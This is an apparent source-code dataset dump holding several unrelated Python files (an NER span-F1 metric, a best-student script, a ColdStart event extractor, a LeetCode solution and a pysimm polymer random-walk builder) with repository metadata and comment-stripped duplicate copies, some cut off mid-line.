        tp = float(self._true_positives)
        precision = tp / float(self._true_positives + self._false_positives + 1e-13)
        recall = tp / float(self._true_positives + self._false_negatives + 1e-13)
        f1_measure = 2. * ((precision * recall) / (precision + recall + 1e-13))
        if reset:
            self.reset()
        return {"precision": precision, "recall": recall, "f1_measure": f1_measure}

    def reset(self):
        """Zero all confusion counters."""
        self._true_positives = 0.0
        self._true_negatives = 0.0
        self._false_positives = 0.0
        self._false_negatives = 0.0
class NerF1Measure(Metric):
    """Span-level F1 for BIO-tagged NER: scores whole decoded entity spans."""

    def __init__(self, label_vocab):
        self.golden_num = 0.0
        self.predict_num = 0.0
        self.right_num = 0.0
        # Maps label ids to tag strings; consumed by get_ner_BIO in __call__.
        self.label_vocab = label_vocab

    def reset(self):
        """Zero the accumulated span counts."""
        self.golden_num = 0.0
        self.predict_num = 0.0
        self.right_num = 0.0

    def get_metric(self, reset=False):
        """Return span precision/recall/F1; -1 flags an undefined value."""
        precision = -1 if self.predict_num == 0.0 else (self.right_num + 0.0) / self.predict_num
        recall = -1 if self.golden_num == 0.0 else (self.right_num + 0.0) / self.golden_num
        if precision == -1 or recall == -1 or (precision + recall) <= 0.:
            f_measure = -1
        else:
            f_measure = 2 * precision * recall / (precision + recall)
        if reset:
            self.reset()
        return {"precision": precision, "recall": recall, "f1_measure": f_measure}

    def update(self, gold_matrix, pred_matrix):
        """Add one sequence's decoded spans to the running totals."""
        # A span is correct only if it appears verbatim in both lists.
        overlap = set(gold_matrix).intersection(set(pred_matrix))
        self.golden_num += len(gold_matrix)
        self.predict_num += len(pred_matrix)
        self.right_num += len(overlap)

    def __call__(self, predictions, gold_labels, mask=None):
        """Decode BIO spans for every sequence in the batch and accumulate them."""
        batch_size = gold_labels.size(0)
        seq_len = gold_labels.size(1)
        predictions, gold_labels, mask = self.unwrap_to_tensors(predictions, gold_labels, mask)
        predictions = predictions.tolist()
        gold_labels = gold_labels.tolist()
        mask = mask.tolist()
        for row in range(batch_size):
            # Keep only unmasked positions, then map label ids to tag strings.
            keep = [col for col in range(seq_len) if mask[row][col] != 0]
            gold_tags = [self.label_vocab[gold_labels[row][col]] for col in keep]
            pred_tags = [self.label_vocab[predictions[row][col]] for col in keep]
            self.update(get_ner_BIO(gold_tags), get_ner_BIO(pred_tags))
| true | true |
f72eb416f3eae037abbad9c26911354d1395878a | 235 | py | Python | CA117/Lab_4/beststudent_31_v1.py | PRITI1999/OneLineWonders | 91a7368e0796e5a3b5839c9165f9fbe5460879f5 | [
"MIT"
] | 6 | 2016-02-04T00:15:20.000Z | 2019-10-13T13:53:16.000Z | CA117/Lab_4/beststudent_31_v1.py | PRITI1999/OneLineWonders | 91a7368e0796e5a3b5839c9165f9fbe5460879f5 | [
"MIT"
] | 2 | 2016-03-14T04:01:36.000Z | 2019-10-16T12:45:34.000Z | CA117/Lab_4/beststudent_31_v1.py | PRITI1999/OneLineWonders | 91a7368e0796e5a3b5839c9165f9fbe5460879f5 | [
"MIT"
] | 10 | 2016-02-09T14:38:32.000Z | 2021-05-25T08:16:26.000Z | (lambda a:print("Best student: {1} {2}\nBest mark: {0}".format(*max([line.split()for line in open(a,'r')],key=lambda x:int(x[0]))))if __import__('os').path.isfile(a)else print("ERROR: File not found! " + a))(__import__('sys').argv[1])
import os
import sys


def _report_best_student(path):
    """Print the best student listed in *path*.

    Each line of the file is expected to look like "<mark> <first> <last>";
    the line with the numerically largest mark wins.  If *path* is not an
    existing file, an error message is printed instead.
    """
    if not os.path.isfile(path):
        print("ERROR: File not found! " + path)
        return
    # Bug fix: the original one-liner passed an open file object into a list
    # comprehension and never closed it; the context manager closes the handle.
    with open(path, 'r') as marks_file:
        records = [line.split() for line in marks_file]
    best = max(records, key=lambda record: int(record[0]))
    # Record layout: [mark, first, last]; any extra columns are ignored by the format.
    print("Best student: {1} {2}\nBest mark: {0}".format(*best))


# Preserve the original script behavior: run immediately on the first CLI argument.
_report_best_student(sys.argv[1])
| true | true |
f72eb438d3abf9cfce6d1a6d2c601b7b771936ca | 3,568 | py | Python | multi_layer_network/src/extract_events.py | hxin18/gaia-entity-resolution | 4f64a0e07ff6aa62ea6f30ce86c6106a7201aaa0 | [
"MIT"
] | null | null | null | multi_layer_network/src/extract_events.py | hxin18/gaia-entity-resolution | 4f64a0e07ff6aa62ea6f30ce86c6106a7201aaa0 | [
"MIT"
] | null | null | null | multi_layer_network/src/extract_events.py | hxin18/gaia-entity-resolution | 4f64a0e07ff6aa62ea6f30ce86c6106a7201aaa0 | [
"MIT"
] | null | null | null | import re
import sys
import json
import getopt
import collections
from datetime import datetime
from collections import defaultdict
### Given RPI ColdStart input, the Entity strings JSON file, and the String strings JSON file, produces the events JSON file. ###
def main(argv):
    """Parse command-line options and run the event extraction.

    Options:
        -h          print usage and exit
        -i/--ifile  RPI ColdStart input file (required)
        -e/--efile  Entity strings JSON file (required)
        -s/--sfile  String strings JSON file (required)
        -o/--ofile  output events JSON file (required)

    Exits with status 2 on bad or missing options.
    """
    usage = ('Given RPI ColdStart input, the Entity strings JSON file, and the '
             'String strings JSON file, produces the events JSON file, usage: '
             'python extract_events.py -i <inputfile> -e <entitystringsfile> '
             '-s <stringstringsfile> -o <outputfile>')
    inputfile = entity_strings = string_strings = outputfile = None
    try:
        opts, _ = getopt.getopt(argv, "hi:e:s:o:", ["ifile=", "efile=", "sfile=", "ofile="])
    except getopt.GetoptError:
        # Bug fix: an unknown option previously escaped as an uncaught traceback.
        print(usage)
        sys.exit(2)
    for opt, arg in opts:
        if opt == '-h':
            print(usage)
            sys.exit()
        elif opt in ("-i", "--ifile"):
            inputfile = arg
        elif opt in ("-e", "--efile"):
            entity_strings = arg
        elif opt in ("-s", "--sfile"):
            string_strings = arg
        elif opt in ("-o", "--ofile"):
            outputfile = arg
    if None in (inputfile, entity_strings, string_strings, outputfile):
        # Bug fix: a missing required option previously raised NameError on the
        # unbound local; fail cleanly with the usage text instead.
        print(usage)
        sys.exit(2)
    extract_events(inputfile, outputfile, entity_strings, string_strings)
def extract_events(path_to_KB_file, path_to_output, path_to_entity_strings, path_to_string_strings):
    """Parse an RPI ColdStart KB file and write its Event mentions to a JSON file.

    The KB file is tab-separated; the code below reads columns as
    (subject-id, predicate, object/value, provenance).  Events are keyed by
    '<event-id>:<provenance>' and collect their type, mention text, document id
    and the resolved strings of their Entity/String arguments.
    """
    # NOTE(review): these two handles are never closed explicitly.
    entity_strings = json.load(open(path_to_entity_strings))
    string_strings = json.load(open(path_to_string_strings))
    # entity_type_to_dict_key = {'PER': 'PER_entities'} --> I didn't use this.
    events = defaultdict(lambda: dict())
    type_look_up_table = {}
    # First pass: record the declared type of every subject id.
    with open(path_to_KB_file) as KB:
        for line in KB:
            fields = re.split('\t', line)
            if len(fields) < 2: continue
            if fields[1] == 'type':
                # fields[2][:-1] drops the trailing newline from the type value.
                type_look_up_table[fields[0]] = fields[2][:-1]
    # Second pass: collect event mentions, then attach their arguments.
    with open(path_to_KB_file) as KB:
        for line in KB:
            fields = re.split('\t', line)
            if len(fields) < 2: continue
            if 'mention' in fields[1]:
                # Only subjects of the form ':Event...' are events.
                if fields[0][1:6] != 'Event': continue
                # type
                events[fields[0][1:] + ':' + fields[3]]['type'] = type_look_up_table[fields[0]]
                # text
                events[fields[0][1:] + ':' + fields[3]]['text'] = fields[2]
                # doc (provenance is '<doc-id>:<offsets>')
                events[fields[0][1:] + ':' + fields[3]]['doc'] = re.split(':', fields[3])[0]
                # # Date --> not serializable, there are some tricks, but I prefer to use the doc id later.
                # if len(re.split('_', re.split(':', fields[3])[0])) == 5:
                #     temporal_info = re.split('_', re.split(':', fields[3])[0])[3]
                # # NYT Exception
                # elif re.split(':', fields[3])[0][0:3] == 'NYT':
                #     temporal_info = re.split('_', re.split(':', fields[3])[0])[2][0:8]
                # event_date = datetime.strptime(temporal_info, '%Y%m%d')
                # events[fields[0][1:] + ':' + fields[3]]['date'] = event_date
                # entities: one bucket per argument category, filled below.
                events[fields[0][1:] + ':' + fields[3]]['STR_entities'] = []
                events[fields[0][1:] + ':' + fields[3]]['PER_entities'] = []
                events[fields[0][1:] + ':' + fields[3]]['ORG_entities'] = []
                events[fields[0][1:] + ':' + fields[3]]['GPE_entities'] = []
                events[fields[0][1:] + ':' + fields[3]]['LOC_entities'] = []
                events[fields[0][1:] + ':' + fields[3]]['FAC_entities'] = []
            # finding entities #
            elif fields[2].startswith(':Entity'):
                if fields[0][1:6] != 'Event': continue
                # Attach the entity's resolved string to every mention of this event.
                for event in events:
                    if event.startswith(fields[0][1:]):
                        entity_type = entity_strings[fields[2]]['type'] + '_entities'
                        events[event][entity_type].append(entity_strings[fields[2]]['selected_string'])
            elif fields[2].startswith(':String'):
                if fields[0][1:6] != 'Event': continue
                for event in events:
                    if event.startswith(fields[0][1:]):
                        events[event]['STR_entities'].append(string_strings[fields[2]]['selected_string'])
    with open(path_to_output, 'w') as output:
        json.dump(events, output)
if __name__ == '__main__':
main(sys.argv[1:])
| 36.040404 | 242 | 0.633688 | import re
import sys
import json
import getopt
import collections
from datetime import datetime
from collections import defaultdict
JSON file, usage: python extract_events.py -i <inputfile> -e <entitystringsfile> -s <stringstringsfile> -o <outputfile>')
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt in ("-e", "--efile"):
entity_strings = arg
elif opt in ("-s", "--sfile"):
string_strings = arg
elif opt in ("-o", "--ofile"):
outputfile = arg
extract_events(inputfile, outputfile, entity_strings, string_strings)
def extract_events(path_to_KB_file, path_to_output, path_to_entity_strings, path_to_string_strings):
entity_strings = json.load(open(path_to_entity_strings))
string_strings = json.load(open(path_to_string_strings))
events = defaultdict(lambda: dict())
type_look_up_table = {}
with open(path_to_KB_file) as KB:
for line in KB:
fields = re.split('\t', line)
if len(fields) < 2: continue
if fields[1] == 'type':
type_look_up_table[fields[0]] = fields[2][:-1]
with open(path_to_KB_file) as KB:
for line in KB:
fields = re.split('\t', line)
if len(fields) < 2: continue
if 'mention' in fields[1]:
if fields[0][1:6] != 'Event': continue
# type
events[fields[0][1:] + ':' + fields[3]]['type'] = type_look_up_table[fields[0]]
# text
events[fields[0][1:] + ':' + fields[3]]['text'] = fields[2]
# doc
events[fields[0][1:] + ':' + fields[3]]['doc'] = re.split(':', fields[3])[0]
# # Date --> not serializable, there are some tricks, but I prefer to use the doc id later.
# if len(re.split('_', re.split(':', fields[3])[0])) == 5:
# temporal_info = re.split('_', re.split(':', fields[3])[0])[3]
# # NYT Exception
# elif re.split(':', fields[3])[0][0:3] == 'NYT':
# temporal_info = re.split('_', re.split(':', fields[3])[0])[2][0:8]
# event_date = datetime.strptime(temporal_info, '%Y%m%d')
# events[fields[0][1:] + ':' + fields[3]]['date'] = event_date
# entities
events[fields[0][1:] + ':' + fields[3]]['STR_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['PER_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['ORG_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['GPE_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['LOC_entities'] = []
events[fields[0][1:] + ':' + fields[3]]['FAC_entities'] = []
# finding entities #
elif fields[2].startswith(':Entity'):
if fields[0][1:6] != 'Event': continue
for event in events:
if event.startswith(fields[0][1:]):
entity_type = entity_strings[fields[2]]['type'] + '_entities'
events[event][entity_type].append(entity_strings[fields[2]]['selected_string'])
elif fields[2].startswith(':String'):
if fields[0][1:6] != 'Event': continue
for event in events:
if event.startswith(fields[0][1:]):
events[event]['STR_entities'].append(string_strings[fields[2]]['selected_string'])
with open(path_to_output, 'w') as output:
json.dump(events, output)
if __name__ == '__main__':
main(sys.argv[1:])
| true | true |
f72eb4628f805442a54c0a5abe345ae985fd1cad | 833 | py | Python | LeetCode/python-R1/0521-最长特殊序列 Ⅰ/V1.py | huuuuusy/Programming-Practice-Everyday | c78b368ab0439d85b8a69f6d9c8154d708bafc9c | [
"Apache-2.0"
] | 4 | 2019-08-27T11:28:03.000Z | 2020-12-24T07:10:22.000Z | LeetCode/python-R1/0521-最长特殊序列 Ⅰ/V1.py | huuuuusy/Programming-Practice-Everyday | c78b368ab0439d85b8a69f6d9c8154d708bafc9c | [
"Apache-2.0"
] | null | null | null | LeetCode/python-R1/0521-最长特殊序列 Ⅰ/V1.py | huuuuusy/Programming-Practice-Everyday | c78b368ab0439d85b8a69f6d9c8154d708bafc9c | [
"Apache-2.0"
] | 4 | 2019-09-20T09:44:01.000Z | 2020-12-24T07:10:23.000Z | """
@Author: huuuuusy
@GitHub: https://github.com/huuuuusy
系统: Ubuntu 18.04
IDE: VS Code 1.36
工具: python == 3.7.3
"""
"""
思路:
代码简单,但是关键是理解题意:
注意题目中的独有两个字:
s1 = 'ab',s2 = 'a',因为ab是s1独有,所以最长子序列为ab;
s1 = 'ab', s2 = 'ab', 因为ab是两个串都有,ab排除,a也是两个串都有,排除,b也是两个串都有,排除。所以最长特殊序列不存在,返回-1;
通过以上分析,我们可以得出结论,如果:两个串相等(不仅长度相等,内容也相等),那么他们的最长特殊序列不存在。返回-1;
如果两个串长度不一样,那么长的串 永远也不可能是 短串的子序列,即len(s1) > len(s2),则最长特殊序列为s1,返回长度大的数。
结果:
执行用时 : 48 ms, 在所有 Python3 提交中击败了75%的用户
内存消耗 : 13.7 MB, 在所有 Python3 提交中击败了6.40%的用户
"""
class Solution:
    def findLUSlength(self, a, b):
        """Return the length of the longest uncommon subsequence of a and b.

        If the strings are equal, every subsequence of one is a subsequence of
        the other, so no uncommon subsequence exists and -1 is returned.
        Otherwise the longer string itself (either one, when lengths match but
        contents differ) cannot be a subsequence of the other, so the answer
        is simply the larger length.
        """
        if a == b:
            return -1
        # Idiom fix: the original built a one-element list and indexed it just
        # to pick the longer string; max() over the lengths is equivalent.
        return max(len(a), len(b))
if __name__ == "__main__":
    # Smoke test: "aba" != "cdc", so the expected output is the longer length, 3.
    a = "aba"
    b = "cdc"
    answer = Solution().findLUSlength(a, b)
    print(answer)
| 22.513514 | 87 | 0.593037 |
class Solution:
def findLUSlength(self, a, b):
if a == b:
return -1
else:
return len([a if len(a) > len(b) else b][0])
if __name__ == "__main__":
a = "aba"
b = "cdc"
answer = Solution().findLUSlength(a, b)
print(answer)
| true | true |
f72eb54af7802f9a7de3342afa34f50fbf810d29 | 13,415 | py | Python | pysimm/apps/random_walk.py | sibo/pysimm_tacticity | cfb20851b26b87b736dbb6a2f4c4e7b668d680d5 | [
"MIT"
] | null | null | null | pysimm/apps/random_walk.py | sibo/pysimm_tacticity | cfb20851b26b87b736dbb6a2f4c4e7b668d680d5 | [
"MIT"
] | null | null | null | pysimm/apps/random_walk.py | sibo/pysimm_tacticity | cfb20851b26b87b736dbb6a2f4c4e7b668d680d5 | [
"MIT"
] | null | null | null | # ******************************************************************************
# pysimm.apps.random_walk module
# ******************************************************************************
#
# psuedo random walk algorithm written using pysimm tools
#
# ******************************************************************************
# License
# ******************************************************************************
# The MIT License (MIT)
#
# Copyright (c) 2016 Michael E. Fortunato, Coray M. Colina
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from time import strftime
from itertools import permutations, izip
import numpy as np
from pysimm import system, lmps, forcefield, calc
from pysimm import error_print
def find_last_backbone_vector(s, m):
    """pysimm.apps.random_walk.find_last_backbone_vector

    Finds vector between backbone atoms in terminal monomer. Requires current
    system s, and reference monomer m.

    Args:
        s: :class:`~pysimm.system.System` object
        m: :class:`~pysimm.system.System` object
    Returns:
        list of vector components (head minus tail; zeros if a linker is absent)
    """
    head = [0, 0, 0]
    tail = [0, 0, 0]
    # Only the most recently added monomer (the last m.particles.count
    # particles of the growing system) is inspected.
    for particle in s.particles[-1 * m.particles.count:]:
        coords = [particle.x, particle.y, particle.z]
        if particle.linker == 'head':
            head = coords
        elif particle.linker == 'tail':
            tail = coords
    return [h - t for h, t in zip(head, tail)]
def copolymer(m, nmon, s_=None, **kwargs):
    """pysimm.apps.random_walk.copolymer
    Builds copolymer using random walk methodology using pattern
    Args:
        m: list of reference monomer :class:`~pysimm.system.System`s
        nmon: total number of monomers to add to chain
        s_: :class:`~pysimm.system.System` in which to build polymer chain (None)
        settings: dictionary of simulation settings
        density: density at which to build polymer (0.3)
        forcefield: :class:`~pysimm.forcefield.Forcefield` object to acquire new force field parameters
        capped: True/False if monomers are capped
        unwrap: True to unwrap final system
        traj: True to build xyz trajectory of polymer growth (True)
        pattern: list of pattern for monomer repeat units, should match length of m ([1 for _ in range(len(m))])
        limit: during MD, limit atomic displacement by this max value (LAMMPS ONLY)
        sim: :class:`~pysimm.lmps.Simulation` object for relaxation between polymer growth
    Returns:
        new copolymer :class:`~pysimm.system.System`
    """
    # Work on copies so the caller's reference monomers stay untouched.
    m = [x.copy() for x in m]
    settings = kwargs.get('settings', {})
    density = kwargs.get('density', 0.3)
    f = kwargs.get('forcefield')
    capped = kwargs.get('capped')
    unwrap = kwargs.get('unwrap')
    traj = kwargs.get('traj', True)
    pattern = kwargs.get('pattern', [1 for _ in range(len(m))])
    limit = kwargs.get('limit', 0.1)
    sim = kwargs.get('sim')
    # Tag head/tail linker particles from the 'X@' prefix of the type name.
    # NOTE(review): str.find returns 0 (falsy) when 'H'/'T' is the FIRST
    # character of the prefix, so such a name would NOT be tagged -- confirm
    # the intended linker-naming convention.
    for m_ in m:
        m_.add_particle_bonding()
        for p in m_.particles:
            if p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('H'):
                p.linker = 'head'
            elif p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('T'):
                p.linker = 'tail'
        m_.remove_linker_types()
    # Seed the chain with one copy of the first monomer.
    if s_ is None:
        s = system.replicate(m[0], 1, density=density/nmon)
    else:
        s = system.replicate(m[0], 1, s_=s_, density=density/nmon)
    print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), 1, nmon))
    # Remember the linker particles of the monomer just added; growth attaches
    # each new monomer's tail to the previous head.
    for p in s.particles:
        if p.linker == 'head':
            last_head = p
        elif p.linker == 'tail':
            last_tail = p
    # Capped monomers carry a cap atom (particle 1) that must be stripped
    # before the monomer can be bonded into the chain.
    for m_ in m:
        if capped:
            m_.particles.remove(1)
            m_.remove_spare_bonding()
            m_.add_particle_bonding()
    s.add_particle_bonding()
    if traj:
        s.write_xyz('random_walk.xyz')
    temp_nmon = 1
    while True:
        # Rotate through the monomer list and its repeat pattern in lockstep.
        m_ = m.pop(0)
        m.append(m_)
        p_ = pattern.pop(0)
        pattern.append(p_)
        # The seed already consumed one unit of the first pattern entry.
        if temp_nmon == 1 and p_ == 1:
            m_ = m.pop(0)
            m.append(m_)
            p_ = pattern.pop(0)
            pattern.append(p_)
        elif temp_nmon == 1:
            p_ -= 1
        for insert in range(p_):
            head = None
            tail = None
            # Direction of the current chain end (tail -> head of the last monomer).
            backbone_vector = np.array([last_head.x - last_tail.x,
                                        last_head.y - last_tail.y,
                                        last_head.z - last_tail.z])
            ref_head = None
            ref_tail = None
            for p in m_.particles:
                if p.linker == 'head':
                    ref_head = p
                elif p.linker == 'tail':
                    ref_tail = p
            if ref_head and ref_tail:
                # Rotate the reference monomer so its backbone aligns with the
                # chain end, then translate it to sit 3 backbone-lengths away.
                ref_backbone_vector = np.array([ref_head.x - ref_tail.x,
                                                ref_head.y - ref_tail.y,
                                                ref_head.z - ref_tail.z])
                rot_matrix = calc.find_rotation(ref_backbone_vector, backbone_vector)
                m_.rotate(around=ref_tail, rot_matrix=rot_matrix)
                translation_vector = [last_tail.x - ref_tail.x,
                                      last_tail.y - ref_tail.y,
                                      last_tail.z - ref_tail.z]
                for p in m_.particles:
                    p.x = p.x + translation_vector[0] + 3*backbone_vector[0]
                    p.y = p.y + translation_vector[1] + 3*backbone_vector[1]
                    p.z = p.z + translation_vector[2] + 3*backbone_vector[2]
            else:
                print('reference molecule has no head or tail')
            n = m_.copy()
            if capped:
                # Drop the cap particle from the current chain end before bonding.
                s.particles.remove(s.particles.count)
                s.remove_spare_bonding()
                s.add_particle_bonding()
            s.add(n, change_dim=False)
            s.add_particle_bonding()
            head = last_head
            for p in s.particles[-1*n.particles.count:]:
                if p.linker == 'tail':
                    tail = p
            # Bond previous head to the new monomer's tail using forcefield f.
            s.make_new_bonds(head, tail, f)
            temp_nmon += 1
            print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), temp_nmon, nmon))
            if unwrap:
                s.unwrap()
            # Build a default relaxation simulation the first time through;
            # reuse (re-point) it on subsequent insertions.
            if sim is None:
                sim = lmps.Simulation(s, name='relax_%03d' % (temp_nmon), log='relax.log', **settings)
                sim.add_md(ensemble='nve', limit=limit, **settings)
                sim.add_min(**settings)
            if isinstance(sim, lmps.Simulation):
                sim.system = s
                sim.name = 'relax_%03d' % (temp_nmon)
                sim.run(np=settings.get('np'))
            if unwrap:
                s.unwrap()
            if unwrap:
                s.wrap()
        # Refresh the chain-end linkers from the monomer just inserted.
        for p in s.particles[-1*n.particles.count:]:
            if p.linker == 'head':
                last_head = p
            elif p.linker == 'tail':
                last_tail = p
        if temp_nmon >= nmon:
            break
        if unwrap:
            if not s.unwrap():
                error_print('something went wrong')
                return s
        if traj:
            s.write_xyz('random_walk.xyz', append=True)
        if unwrap:
            s.wrap()
    # Make sure every particle is registered with its molecule before output.
    for p in s.particles:
        if p not in s.molecules[p.molecule.tag].particles:
            s.molecules[p.molecule.tag].particles.add(p)
    s.write_lammps('polymer.lmps')
    s.unwrap()
    s.write_xyz('polymer.xyz')
    return s
def random_walk(m, nmon, s_=None, **kwargs):
    """pysimm.apps.random_walk.random_walk
    Builds homopolymer using random walk methodology
    Args:
        m: reference monomer :class:`~pysimm.system.System`
        nmon: total number of monomers to add to chain
        s_: :class:`~pysimm.system.System` in which to build polymer chain (None)
        extra_bonds: EXPERIMENTAL, True if making ladder backbone polymer
        settings: dictionary of simulation settings
        density: density at which to build polymer (0.3)
        forcefield: :class:`~pysimm.forcefield.Forcefield` object to acquire new force field parameters
        capped: True/False if monomers are capped
        unwrap: True to unwrap final system
        traj: True to build xyz trajectory of polymer growth (True)
        limit: during MD, limit atomic displacement by this max value (LAMMPS ONLY)
        sim: :class:`~pysimm.lmps.Simulation` object for relaxation between polymer growth
    Returns:
        new polymer :class:`~pysimm.system.System`
    """
    # Work on a copy so the caller's reference monomer stays untouched.
    m = m.copy()
    extra_bonds = kwargs.get('extra_bonds', False)
    settings = kwargs.get('settings', {})
    density = kwargs.get('density', 0.3)
    f = kwargs.get('forcefield')
    capped = kwargs.get('capped')
    unwrap = kwargs.get('unwrap')
    traj = kwargs.get('traj', True)
    limit = kwargs.get('limit', 0.1)
    sim = kwargs.get('sim')
    m.add_particle_bonding()
    # Tag head/tail linker particles from the 'X@' prefix of the type name.
    # NOTE(review): str.find returns 0 (falsy) when 'H'/'T' is the FIRST
    # character of the prefix, so such a name would NOT be tagged -- confirm
    # the intended linker-naming convention.
    for p in m.particles:
        if p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('H'):
            p.linker = 'head'
        elif p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('T'):
            p.linker = 'tail'
    m.remove_linker_types()
    # Seed the chain with a single monomer.
    if s_ is None:
        s = system.replicate(m, 1, density=density/nmon)
    else:
        s = system.replicate(m, 1, s_=s_, density=None)
    print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), 1, nmon))
    if traj:
        s.write_xyz('random_walk.xyz')
    # Capped monomers carry a cap atom (particle 1) that is stripped before growth.
    if capped:
        m.particles.remove(1)
        m.remove_spare_bonding()
        m.add_particle_bonding()
    for insertion in range(nmon - 1):
        head = None
        tail = None
        backbone_vector = np.array(find_last_backbone_vector(s, m))
        # Place the reference monomer 3 backbone-lengths beyond the chain end.
        # izip is Python 2 (itertools); under Python 3 this would be zip.
        for p, p_ in izip(s.particles[-1*m.particles.count:], m.particles):
            p_.x = p.x + 3*backbone_vector[0]
            p_.y = p.y + 3*backbone_vector[1]
            p_.z = p.z + 3*backbone_vector[2]
        n = m.copy()
        if capped:
            # Drop the cap particle from the current chain end before bonding.
            s.particles.remove(s.particles.count)
            s.remove_spare_bonding()
            s.add_particle_bonding()
        # Ladder polymers (extra_bonds) can have several head/tail linkers
        # per monomer; collect them all, otherwise keep a single pair.
        if extra_bonds:
            heads = []
            for p in s.particles[-1*n.particles.count:]:
                if p.linker == 'head':
                    heads.append(p)
        else:
            for p in s.particles[-1*n.particles.count:]:
                if p.linker == 'head':
                    head = p
        s.add(n, change_dim=False)
        s.add_particle_bonding()
        if extra_bonds:
            tails = []
            for p in s.particles[-1*n.particles.count:]:
                if p.linker == 'tail':
                    tails.append(p)
        else:
            for p in s.particles[-1*n.particles.count:]:
                if p.linker == 'tail':
                    tail = p
        # Diagnostic: report any particle left without bonds.
        for p in s.particles:
            if not p.bonded_to:
                print(p.tag)
        if head and tail:
            s.make_new_bonds(head, tail, f)
            print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), insertion+2, nmon))
        elif extra_bonds and len(heads) == len(tails):
            for h, t in izip(heads, tails):
                s.make_new_bonds(h, t, f)
            print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), insertion+2, nmon))
        else:
            print('cannot find head and tail')
        # Build a default relaxation simulation the first time through;
        # reuse (re-point) it on subsequent insertions.
        if sim is None:
            sim = lmps.Simulation(s, name='relax_%03d' % (insertion+2), log='relax.log', **settings)
            sim.add_md(ensemble='nve', limit=limit, **settings)
            sim.add_min(**settings)
        if isinstance(sim, lmps.Simulation):
            sim.system = s
            sim.name = 'relax_%03d' % (insertion+2)
            sim.run(np=settings.get('np'))
        if unwrap:
            if not s.unwrap():
                error_print('something went wrong')
                return s
        if traj:
            s.write_xyz('random_walk.xyz', append=True)
        if unwrap:
            s.wrap()
    # Make sure every particle is registered with its molecule before output.
    for p in s.particles:
        if p not in s.molecules[p.molecule.tag].particles:
            s.molecules[p.molecule.tag].particles.add(p)
    s.write_lammps('polymer.lmps')
    s.unwrap()
    s.write_xyz('polymer.xyz')
    return s
| 34.309463 | 112 | 0.547372 |
from time import strftime
from itertools import permutations, izip
import numpy as np
from pysimm import system, lmps, forcefield, calc
from pysimm import error_print
def find_last_backbone_vector(s, m):
    """Return the head-minus-tail vector of the last monomer added to system *s*.

    Only the final m.particles.count particles of *s* (the terminal monomer)
    are inspected; a missing linker leaves its position at the origin.
    """
    head = [0, 0, 0]
    tail = [0, 0, 0]
    for particle in s.particles[-1 * m.particles.count:]:
        coords = [particle.x, particle.y, particle.z]
        if particle.linker == 'head':
            head = coords
        elif particle.linker == 'tail':
            tail = coords
    return [h - t for h, t in zip(head, tail)]
def copolymer(m, nmon, s_=None, **kwargs):
m = [x.copy() for x in m]
settings = kwargs.get('settings', {})
density = kwargs.get('density', 0.3)
f = kwargs.get('forcefield')
capped = kwargs.get('capped')
unwrap = kwargs.get('unwrap')
traj = kwargs.get('traj', True)
pattern = kwargs.get('pattern', [1 for _ in range(len(m))])
limit = kwargs.get('limit', 0.1)
sim = kwargs.get('sim')
for m_ in m:
m_.add_particle_bonding()
for p in m_.particles:
if p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('H'):
p.linker = 'head'
elif p.type.name.find('@') >= 0 and p.type.name.split('@')[0].find('T'):
p.linker = 'tail'
m_.remove_linker_types()
if s_ is None:
s = system.replicate(m[0], 1, density=density/nmon)
else:
s = system.replicate(m[0], 1, s_=s_, density=density/nmon)
print('%s: %s/%s monomers added' % (strftime('%H:%M:%S'), 1, nmon))
for p in s.particles:
if p.linker == 'head':
last_head = p
elif p.linker == 'tail':
last_tail = p
for m_ in m:
if capped:
m_.particles.remove(1)
m_.remove_spare_bonding()
m_.add_particle_bonding()
s.add_particle_bonding()
if traj:
s.write_xyz('random_walk.xyz')
temp_nmon = 1
while True:
m_ = m.pop(0)
m.append(m_)
p_ = pattern.pop(0)
pattern.append(p_)
if temp_nmon == 1 and p_ == 1:
m_ = m.pop(0)
m.append(m_)
p_ = pattern.pop(0)
pattern.append(p_)
elif temp_nmon == 1:
p_ -= 1
for insert in range(p_):
head = None
tail = None
backbone_vector = np.array([last_head.x - last_tail.x,
last_head.y - last_tail.y,
last_head.z - last_tail.z])
ref_head = None
ref_tail = None
for p in m_.particles:
if p.linker == 'head':
ref_head = p
elif p.linker == 'tail':
ref_tail = p
if ref_head and ref_tail:
ref_backbone_vector = np.array([ref_head.x - ref_tail.x,
ref_head.y - ref_tail.y,
ref_head.z - ref_tail.z])
rot_matrix = calc.find_rotation(ref_backbone_vector, backbone_vector)
m_.rotate(around=ref_tail, rot_matrix=rot_matrix)
translation_vector = [last_tail.x - ref_tail.x,
last_tail.y - ref_tail.y,
last_tail.z - ref_tail.z]
for p in m_.particles:
p.x = p.x + translation_vector[0] + 3*backbone_vector[0]
p.y = p.y + translation_vector[1] + 3*backbone_vector[1]
